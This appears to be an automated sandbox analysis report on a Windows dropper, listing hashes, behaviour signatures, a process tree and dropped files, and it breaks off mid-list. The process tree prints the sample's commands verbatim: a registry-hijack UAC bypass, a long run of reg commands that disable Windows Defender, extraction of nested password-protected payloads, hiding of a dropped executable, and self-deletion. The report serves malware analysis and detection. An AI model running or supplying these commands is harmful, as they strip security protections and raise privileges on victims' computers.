Resubmissions

12-08-2024 19:23

240812-x3zrzazfqd 10

12-08-2024 19:07

240812-xs25cazbpd 10

11-08-2024 02:13

240811-cntl7azfnl 10

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    12-08-2024 19:23

General

  • Target

    889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe

  • Size

    10.1MB

  • MD5

    889956cee776d41937c39e225d3e72b6

  • SHA1

    cc8d22b6c453deb2ac2826610cb001b3dd0e9771

  • SHA256

    52bd35dbb0a393f952096a135fc0d8bddf2892977e72a547f604d53433addfb5

  • SHA512

    2fde4df02392114a2e2676963d05d2a40c748710de7e30dad3deb1083fa1e991c85ae49520d679905ae21eaaed7f0458f38454ce04ea1d6544576f0ca3934de4

  • SSDEEP

    196608:JAw2q0MYZLUFq6f07RGqOu0GIawyGkFk2uH4Fe4Baw0YzDOD0O7TjQq3IZ:76gFNMFuu0GIawyG714B/yD0OPje

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 14 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry class 11 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Users\Admin\AppData\Local\Temp\is-I7O8V.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-I7O8V.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp" /SL5="$50150,9875652,804864,C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1764
      • C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe
        "C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Users\Admin\AppData\Local\Temp\is-27UUF.tmp\Adobe.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-27UUF.tmp\Adobe.tmp" /SL5="$901AE,5833262,804864,C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:2720
          • C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe
            "C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Modifies system certificate store
            PID:2588
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\ProgramData\wu10.uac.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:280
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1940
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
              6⤵
              • Modifies registry class
              PID:1812
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\ProgramData\wu10.wdcloud.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1108
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:2412
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2192
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:708
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2288
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:2176
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:1972
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:1440
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:824
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:2080
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3064
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
              6⤵
                PID:3052
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2344
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:900
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                6⤵
                  PID:3020
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:1800
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:1460
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1588
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\ProgramData\main.bat" "
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:620
                  • C:\Windows\SysWOW64\mode.com
                    mode 65,10
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2264
                  • C:\ProgramData\7z.exe
                    7z.exe e file.zip -p___________1903pwd1764pwd14586___________ -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2156
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1656
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\ProgramData\wu10.delete.bat" "
                  6⤵
                    PID:1128
                    • C:\Windows\SysWOW64\PING.EXE
                      ping -n 60 127.1
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:2480
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\ProgramData\wu10.uac.bat" "
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2792
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
                4⤵
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                PID:264
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
                4⤵
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                PID:1744
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\ProgramData\wu10.wdcloud.bat" "
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2584
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                4⤵
                  PID:1816
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2360
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1736
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1232
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:1692
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:1924
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1480
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:1572
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:1592
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2012
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:816
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2876
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2840
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2788
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3004
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                  4⤵
                    PID:2240
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2716
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\ProgramData\main.bat" "
                    4⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:580
                    • C:\Windows\SysWOW64\mode.com
                      mode 65,10
                      5⤵
                        PID:648
                      • C:\ProgramData\7z.exe
                        7z.exe e file.zip -p___________27117pwd32413pwd32179___________ -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1912
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_7.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2620
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_6.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:236
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_5.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2636
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_4.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1904
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_3.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2736
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_2.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3060
                      • C:\ProgramData\7z.exe
                        7z.exe e extracted/file_1.zip -oextracted
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2696
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +H "00008.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Views/modifies file attributes
                        PID:2596
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2560
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ""C:\ProgramData\wu10.delete.bat" "
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1612
                      • C:\Windows\SysWOW64\PING.EXE
                        ping -n 60 127.1
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:784
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1088
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1016
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        5⤵
                          PID:2872
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:816
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2876
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del main.bat"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:1912
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2840
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del file.bin"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2788
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2880
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:968
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:1680
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:1704
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          5⤵
                            PID:2084
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2100
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2060
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"
                            5⤵
                              PID:2240
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              5⤵
                                PID:2884
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2892

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe

                        Filesize

                        7.3MB

                        MD5

                        de70f0deed893bba56ccb78eafd59606

                        SHA1

                        f351b0c2996a3573d36deab9b6b3961876189f71

                        SHA256

                        b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d

                        SHA512

                        86459d1e7ba8480cf005087450d7dcf969dcd6f6fd228012d7542539ff74d72105a35b3a8d8216e1b44cdee21730a1ddb32d9b5d20073099cb4da5a56c77fc41

                      • C:\ProgramData\7z.dll

                        Filesize

                        1.6MB

                        MD5

                        72491c7b87a7c2dd350b727444f13bb4

                        SHA1

                        1e9338d56db7ded386878eab7bb44b8934ab1bc7

                        SHA256

                        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                        SHA512

                        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                      • C:\ProgramData\7z.exe

                        Filesize

                        458KB

                        MD5

                        619f7135621b50fd1900ff24aade1524

                        SHA1

                        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                        SHA256

                        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                        SHA512

                        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                      • C:\ProgramData\extracted\123.exe

                        Filesize

                        1.1MB

                        MD5

                        1ec2d07dfed88c9740b4fc575b667646

                        SHA1

                        b01d9d4ea36db6007e3f3f46c41b4cc71e2a4b70

                        SHA256

                        46c0fced58c4190739fdb56a3914bcc7b8bf9a2fd8a1ad480fffa4d05c5a620d

                        SHA512

                        a572764544b72560cdc9b804b3ae358e8b7731d6432c7a2f0ba3831950b969a1e55df458108bb7ffbaad35a95778ff01e44bdfa557d95e0be1939a871a926913

                      • C:\ProgramData\extracted\ANTIAV~1.DAT

                        Filesize

                        2.0MB

                        MD5

                        1334c46a0162f10b2dc650ce10129ef6

                        SHA1

                        d3a27b0dd33ad45930f7d964ca82ef6920f81d64

                        SHA256

                        081a4d9b98b096147c0f1225a7fff9bc20b984f7469443d32738641e7326642b

                        SHA512

                        24e1ba20566ccc059a2e2df68ec1e22fa4a54ae5299efdc0c7df271459b4c96942d6410faa48f52aec15a68132c1bb9830cdcaaaaa527f7870c6e83ca8bcefa3

                      • C:\ProgramData\extracted\file_1.zip

                        Filesize

                        814KB

                        MD5

                        66f81adc3394431d519b2a74fa8c9b6f

                        SHA1

                        2ce7fd3b4a749fb3e0be6aa7d7a2c78d2d95ffe0

                        SHA256

                        1c1b901ee6f26266f2a6b0319b79ac2480fa646fc4e411f0b9f9d284dc446e6d

                        SHA512

                        38667b3cf4b336d71539f662105b569e6626fcb4c8214eac88a8a1c18db6053c07fc6ecfe4c002189cd78fc64212dc40df7f8600874b85de0c5231ad55a064a6

                      • C:\ProgramData\extracted\file_2.zip

                        Filesize

                        814KB

                        MD5

                        bcfb7f39718cfd006e4aed81677c5ce6

                        SHA1

                        7003fc934d0c3a3e5746b157971422ca2c222c3f

                        SHA256

                        f3087ab6ee1162eeed6b7b9f5757eea66c5012c7421592495937aee96fcca212

                        SHA512

                        9e2b0a55e892917051e24a22fd5774745a4b59a085da64af2326f279aa9058da6e1cf2594b99cd690c44730cc13128b51549d6e19d3446b0afef74ddba6b5601

                      • C:\ProgramData\extracted\file_3.zip

                        Filesize

                        814KB

                        MD5

                        9c9e2760a7aa347f88d811e6dc6fa1e0

                        SHA1

                        d43413903d00d0d5f72db3ddcf4f4431f34757c9

                        SHA256

                        b90316e305b1e6d2e1865339dee7ffd427887c4af37e7dd5d51fec3237429cde

                        SHA512

                        77930f4f4e1442f32506b4f2123f7efd296b01ee570f0f94d7189c1b2190e77d91125daf34472a743647208d467753b4cc5241d2504568403e8eb9aef84f1cb6

                      • C:\ProgramData\extracted\file_4.zip

                        Filesize

                        814KB

                        MD5

                        36503c4a6f4ef96de8edb0e6a37bd416

                        SHA1

                        28b878aa69fd722ee4e631d9467adf75c64a232c

                        SHA256

                        b982f3c450eadce6f2c0017f02f4a0c92b81bbb67075cb9628cb6adb51403314

                        SHA512

                        cdb2f0d74eaad4b19bf6b58448368f04ef0f7dadd19c2d68c31547f9fe38c723dbdd81fb8726fe447845f9645d958c387e2ce577a629a5a4365ad4b6559e24a9

                      • C:\ProgramData\extracted\file_5.zip

                        Filesize

                        814KB

                        MD5

                        6cb625137943a5cb2ff9a42fdd98ab87

                        SHA1

                        29eb39eb180dba7c3e7d975c5de3d01a90a2dd73

                        SHA256

                        d11f2efd6899e05f360c3205ba7451847faf479b4f2749c2afef9d87e43bd9be

                        SHA512

                        5181743b69a508bd7ca52c16a0f57e1b3428205b1f21623908c5c1bbaf9ebea377802a0fab5730b3236ad9349b8ead45858072afcce451842e294940ca90a8cc

                      • C:\ProgramData\extracted\file_6.zip

                        Filesize

                        814KB

                        MD5

                        b7194aa2a39fa246856c4e08da206650

                        SHA1

                        0371b399624546ceee5301eb431b5c0d0cc07062

                        SHA256

                        9c05ab822a0d50ff1e316a845a1a59637c20094c51d92e428c4aa31f6ab57e86

                        SHA512

                        2a781154a2150cee237d0530351b63cb472fadeb7ed4e9fe234fcde121e544eb882446042c74fa3acce2ac69a23009225a7a5d0d332601b20e718ace0f120d8d

                      • C:\ProgramData\extracted\file_7.zip

                        Filesize

                        2.3MB

                        MD5

                        f14fe008e9c02be1121851a65ddd819c

                        SHA1

                        2e1e20e6e9128ef4d2ff6f506e98718fc8a6cc2c

                        SHA256

                        8e74cc755da6554162e11bcf6e8f363ab4ec76158ba1cb36956147c4c88edbf1

                        SHA512

                        a615e0856cefd62ae13e67c3c1a3b4f408abc9e66b3b534ac0273074aae7de4454fb394e3b9e058449afc129406be9c36d96076c7f7cab29cca034987d7239c1

                      • C:\ProgramData\file.bin

                        Filesize

                        2.3MB

                        MD5

                        70fc649e1636c2705138783ee5495ad9

                        SHA1

                        fd66954bd03d7549dbc337f7d4939a3c1d57d0f2

                        SHA256

                        711a49c3f419fb284eeca6b7ad9e52f5471562a760f269e32d1f930eb50750fe

                        SHA512

                        19c257d12acebc4be39daa483df237e917fb09b26e62e4051437029df28a3ffe738b52573d6f3ba13b770884be2f18b66fc1b85109209fe2e91fbceeb37753af

                      • C:\ProgramData\file.bin

                        Filesize

                        2.0MB

                        MD5

                        c439fa38d73b7548100c3ef8b30ae5f8

                        SHA1

                        ab3f05798c93049c0a0dabb0996cb5ce2d4f21a0

                        SHA256

                        a9130c4d7571821a0bbd7731e329bbb3b3fc0da57c1170f392db84d8ffa76b7c

                        SHA512

                        4371aee58d3a8a1c58b463e02c9ae07d3483b30766af35eba103a3ff47cd9f3be80d5c52efc91fe9d53c4209dc9772f1f87c72bedc6c3043dc841f68d4dc94f1

                      • C:\ProgramData\main.bat

                        Filesize

                        383B

                        MD5

                        564689fbb804cae85e189fa356bdffab

                        SHA1

                        032abc812bd5979f8e4d89c9a9ebc318cab4faee

                        SHA256

                        a74020b5c6eeb0444ba3de36d1cb37b578107d3fa78acfa5110eb5b1d06aaa2c

                        SHA512

                        4b4aef287663c466acd360047c107c807e50efa5e8eee12bf196209df5d5e5412dbdd4b1ae0c0bec9f6b4dfc41a6429a864d94280e3f2087e9a6fb3f4e2cc62a

                      • C:\ProgramData\main.bat

                        Filesize

                        389B

                        MD5

                        d9cf681686547265496d12488ea5ff37

                        SHA1

                        e62e3980995d3799228ee1806f0c1b21c985fb56

                        SHA256

                        25473e23f350ec5ba71151914e51c4511548917ca0304ee4de57f0ddb139b8a6

                        SHA512

                        8bb88c8a68a0938586424adf72f83bcec235b7d0218449d98730496cc902f4f0a2b1ce2638158be299067605455fb3ead5da9afd68c547fdde6021d31b655b33

                      • C:\ProgramData\wu10.2run.vbs

                        Filesize

                        138B

                        MD5

                        5a14fa9448a36120fa13e30c1c27cea1

                        SHA1

                        d9ee005ff4638392b77541a9ceddbf17df53ab82

                        SHA256

                        9371524b0fdb3d92b5c7c90f040c962ca129395d4688ef898087045223ee6f73

                        SHA512

